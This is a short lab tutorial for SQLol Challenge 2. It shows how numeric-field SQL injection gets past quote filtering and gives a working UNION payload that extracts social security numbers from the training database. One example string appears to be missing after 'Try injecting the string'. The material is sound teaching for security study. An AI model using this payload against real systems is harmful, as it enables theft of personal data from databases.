SQLol Tutorial 2

SQLol Challenge 2 - The Failure of Quote Filters

Many people mistakenly believe that filtering out single quotes is sufficient to prevent SQL injection attacks. This challenge was created to prove that it is not. In this challenge, you are tasked with retrieving the social security numbers from the database as was done in Challenge 1.

When injecting into a numeric field in a SQL query, you do not need to break out of single quotes as part of your injection. The original query looks like this:

SELECT username FROM users WHERE isadmin = OUR_INPUT_HERE GROUP BY username ORDER BY username ASC
The isadmin variable is Boolean, expected to have the value true or false. Try injecting the string
The results show you which users are administrators.

We can perform the same injection attacks as shown in Challenge 1, except that we don't need quotes. Instead, we can just add SQL commands after the Boolean variable using a space.

Once we have found our SSN table, we can pull all the data using the following injection string:

true union select ssn as username from sqlol.ssn where 1=1
Notice that this query gets the SSNs followed by the usernames of the administrators. That's what the UNION command does--concatenate two tables together.


This is just a rewritten version of the tutorial2.txt file included with SQlol.

Posted 12-31-12 by Sam Bowne